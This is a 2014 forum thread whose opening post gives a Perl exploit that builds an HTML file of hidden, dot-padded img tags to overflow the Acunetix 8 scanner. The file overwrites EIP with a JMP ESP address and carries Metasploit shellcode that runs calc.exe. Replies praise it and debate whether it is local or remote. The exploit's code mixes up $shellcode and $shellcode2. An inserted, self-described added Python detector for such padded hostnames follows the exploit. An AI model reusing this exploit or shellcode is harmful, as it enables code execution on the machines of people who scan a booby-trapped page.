SirGod Posted April 24, 2014

Have fun!

```perl
# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP

# This exploit generates an HTML file; if this HTML is scanned with ACUNETIX, shell will be executed.

my $file = "index.html";

my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";

# each image tag is hidden with opacity 0 so the page looks empty in a browser
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";

# filler "hostnames" placed before the overflowing one
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

# the hostname that carries the overflow
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202 - length($ExploitDomain));
my $Padding1 = "A" x 66;
my $Padding2 = "B" x 4;
my $FlowCorrector = "500f";  # 0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~";   # 0x7e79515d (JMP ESP from SXS.DLL)

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";

# assemble the filler image tags and the overflowing one
my $FinalDomainName1 = $IMGheader1 . $DomainName1 . $GeneralDotPadding . $IMGheader2;
my $FinalDomainName2 = $IMGheader1 . $DomainName2 . $GeneralDotPadding . $IMGheader2;
my $FinalDomainName3 = $IMGheader1 . $DomainName3 . $GeneralDotPadding . $IMGheader2;
my $FinalDomainName4 = $IMGheader1 . $DomainName4 . $GeneralDotPadding . $IMGheader2;
my $FinalDomainName5 = $IMGheader1 . $DomainName5 . $GeneralDotPadding . $IMGheader2;
my $FinalExploitDomain = $IMGheader1 . $ExploitDomain . $DotPadding . $Padding1 . $FlowCorrector . $Padding2 . $EIPOverWrite . $shellcode . $IMGheader2;

# write everything out as index.html
open($FILE, ">$file");
print $FILE $HTMLHeader1 . $FinalDomainName1 . $FinalDomainName2 . $FinalDomainName3 . $FinalDomainName4 . $FinalDomainName5 . $FinalExploitDomain . $HTMLHeader2;
close($FILE);
print "Acunetix Killer File Created successfully\n";
```
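A defender-side check, added here as an example and not code from the thread, the exploit author or Acunetix: it parses an HTML file and flags every `<img src>` whose host cannot be a real hostname (over 253 characters, a label over 63 characters, empty labels from runs of dots, or non-hostname characters), which is exactly the shape of the padded image tags in the file above. The sample HTML is constructed and only mimics the padding, not the payload.

```python
import re
from html.parser import HTMLParser

MAX_HOST_LEN = 253   # RFC 1035: whole hostname
MAX_LABEL_LEN = 63   # RFC 1035: each dot-separated label
LABEL_RE = re.compile(r"^[A-Za-z0-9-]+$")


class _ImgSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):  # collects quoted and unquoted src values
        if tag.lower() == "img":
            self.srcs.extend(v for k, v in attrs if k.lower() == "src" and v)


def host_of(src):
    """Authority host of a URL, parsed by hand: urllib rejects bytes such as ']'."""
    rest = re.sub(r"^[A-Za-z][A-Za-z0-9+.-]*://", "", src, count=1)
    authority = re.split(r"[/?#]", rest, maxsplit=1)[0]   # cut path/query/fragment
    return authority.rsplit("@", 1)[-1].split(":", 1)[0]  # drop userinfo and port


def host_findings(host):
    """Reasons this host is not a plausible hostname; empty list if it is."""
    labels = host.split(".")
    reasons = []
    if len(host) > MAX_HOST_LEN:
        reasons.append(f"hostname length {len(host)} > {MAX_HOST_LEN}")
    if "" in labels:
        reasons.append("empty label (consecutive dots)")
    if any(len(lab) > MAX_LABEL_LEN for lab in labels):
        reasons.append(f"label longer than {MAX_LABEL_LEN}")
    if any(lab and not LABEL_RE.match(lab) for lab in labels):
        reasons.append("non-hostname characters in label")
    return reasons


def scan_html(html):
    """Return [(src, reasons)] for each <img src> whose host fails the checks."""
    collector = _ImgSrcCollector()
    collector.feed(html)
    return [(s, r) for s in collector.srcs if (r := host_findings(host_of(s)))]


# Constructed sample: one normal image plus two padded hosts shaped like the thread's file.
SAMPLE_HTML = ('<html>\n<img src="http://img.example.com/a.png">\n'
               '<img style="opacity:0.0" src=http://XSS' + "." * 190 + '><br>\n'
               '<img style="opacity:0.0" src=http://SQLInjection' + "." * 190 + "A" * 70 + '><br>\n'
               '</html>')
```

Run `scan_html` over a file's contents before a scanner or crawler is pointed at untrusted pages; a normal site produces no findings, while the padded tags above trip several checks each.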
Nytro Posted April 24, 2014

Brilliant
tpad Posted April 24, 2014 (edited)

acunetix, 39 minutes ago:
> We cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9. However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the crack replaced the executable with another executable.

It figures.

Edited April 24, 2014 by tpad
sleed Posted April 24, 2014

Very cool. Has anyone tested it? Because I don't have Acunetix.
neox Posted April 26, 2014

At first glance it looks interesting, but it is not a remote exploit; it is a local exploit, you can clearly see it creating the file index.html. An7i Security: Pwn the n00bs - Acunetix 0day ---> video. Either I am thick-headed or this is a local exploit. For example, this exploit from exploit-db, Acunetix 8 build 20120704 - Remote Stack Based Overflow, looks like a remote exploit but it is the same "create file" thing; it uses calc and a back-connect as the payload, not a direct attack on a port or other wonders that would make it remote. In this video it likewise creates a file. I say this is a local exploit.